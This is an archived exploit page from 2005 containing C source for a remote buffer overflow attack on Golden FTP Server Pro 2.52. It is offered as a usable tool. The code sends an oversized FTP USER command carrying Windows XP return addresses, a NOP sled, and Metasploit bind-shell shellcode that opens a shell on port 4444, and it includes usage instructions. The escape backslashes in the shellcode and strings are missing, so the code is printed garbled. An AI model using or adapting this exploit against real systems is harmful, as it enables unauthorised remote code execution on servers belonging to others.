Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit
# Published : 2005-04-29
# Author : ATmaCA
# Previous Title : MS Windows WINS Vulnerability and OS/SP Scanner
# Next Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (2nd)
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and metasploit
* Usage:exploit <targetOs> <targetIp>
*
*/

/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

char *target[]=  //return addr
{
       "xFCx18xD7x77",   //WinXp Sp1 Eng - jmp esp addr
       "xBFxACxDAx77"    //WinXp Sp2 Eng - jmp esp addr
};

char shellcode[] =
/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
"x31xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x82"
"x2ax64x94x83xebxfcxe2xf4x7ex40x8fxdbx6axd3x9bx6b"
"x7dx4axefxf8xa6x0exefxd1xbexa1x18x91xfax2bx8bx1f"
"xcdx32xefxcbxa2x2bx8fx77xb2x63xefxa0x09x2bx8axa5"
"x42xb3xc8x10x42x5ex63x55x48x27x65x56x69xdex5fxc0"
"xa6x02x11x77x09x75x40x95x69x4cxefx98xc9xa1x3bx88"
"x83xc1x67xb8x09xa3x08xb0x9ex4bxa7xa5x42x4exefxd4"
"xb2xa1x24x98x09x5ax78x39x09x6ax6cxcaxeaxa4x2ax9a"
"x6ex7ax9bx42xb3xf1x02xc7xe4x42x57xa6xeax5dx17xa6"
"xddx7ex9bx44xeaxe1x89x68xb9x7ax9bx42xddxa3x81xf2"
"x03xc7x6cx96xd7x40x66x6bx52x42xbdx9dx77x87x33x6b"
"x54x79x37xc7xd1x79x27xc7xc1x79x9bx44xe4x42x75xc8"
"xe4x79xedx75x17x42xc0x8exf2xedx33x6bx54x40x74xc5"
"xd7xd5xb4xfcx26x87x4ax7dxd5xd5xb2xc7xd7xd5xb4xfc"
"x67x63xe2xddxd5xd5xb2xc4xd6x7ex31x6bx52xb9x0cx73"
"xfbxecx1dxc3x7dxfcx31x6bx52x4cx0exf0xe4x42x07xf9"
"x0bxcfx0exc4xdbx03xa8x1dx65x40x20x1dx60x1bxa4x67"
"x28xd4x26xb9x7cx68x48x07x0fx50x5cx3fx29x81x0cxe6"
"x7cx99x72x6bxf7x6ex9bx42xd9x7dx36xc5xd3x7bx0ex95"
"xd3x7bx31xc5x7dxfax0cx39x5bx2fxaaxc7x7dxfcx0ex6b"
"x7dx1dx9bx44x09x7dx98x17x46x4ex9bx42xd0xd5xb4xfc"
"x72xa0x60xcbxd1xd5xb2x6bx52x2ax64x94";

char nops[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90";

char passreq[] =
"PASS rn";

void main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in 	sock;
        SOCKET mysocket;
        char rec[1024];

        if (argc < 3)
        {
                printf("rnGolden FTP Server Pro Remote Buffer Overflow Exploitrn",argv[0]);
                printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)rn");
                printf("Exploit coded By ATmaCArn");
                printf("Web: atmacasoft.com && spyinstructors.comrn");
                printf("Credit to kozan and metasploitrn");
                printf("Usage:rnexploit <targetOs> <targetIp>rnrn",argv[0]);
                printf("Targets:n");
                printf("1 - WinXP SP1 englishn");
                printf("2 - WinXP SP2 englishn");
                printf("Example:exploit 2 127.0.0.1n");

                return;
       }
       int targetnum = atoi(argv[1]) - 1;

       char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
                                +sizeof(passreq)+7);
       strcpy(evilbuf,userreq);
       strcat(evilbuf,target[targetnum]);
       strcat(evilbuf,nops);
       strcat(evilbuf,shellcode);
       strcat(evilbuf,"rn");
       strcat(evilbuf,passreq);
       //printf("%s",evilbuf);

       wVersionRequested = MAKEWORD(1, 1);
       if (WSAStartup(wVersionRequested, &wsaData) < 0) return;



       mysocket = socket(AF_INET, SOCK_STREAM, 0);
       if(mysocket==INVALID_SOCKET){
                  printf("Socket error!rn");
                  exit(1);
       }

       printf("Resolving Hostnames...n");
       if ((pTarget = gethostbyname(argv[2])) == NULL){
                  printf("Resolve of %s failedn", argv[1]);
                  exit(1);
       }

       memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
       sock.sin_family = AF_INET;
       sock.sin_port = htons(21);

       printf("Connecting...n");
       if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
                  printf("Couldn't connect to host.n");
                  exit(1);
       }

       printf("Connected!...n");
       printf("Waiting for welcome message...n");
       Sleep(10);
       recv(mysocket,rec,1024,0);

       printf("Sending evil request...n");
       if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
                  printf("Error Sending evil request.rn");
                  closesocket(mysocket);
                  exit(1);
       }

       Sleep(10);
       printf("Success.n");
       closesocket(mysocket);
       WSACleanup();
}

// www.Syue.com [2005-04-29]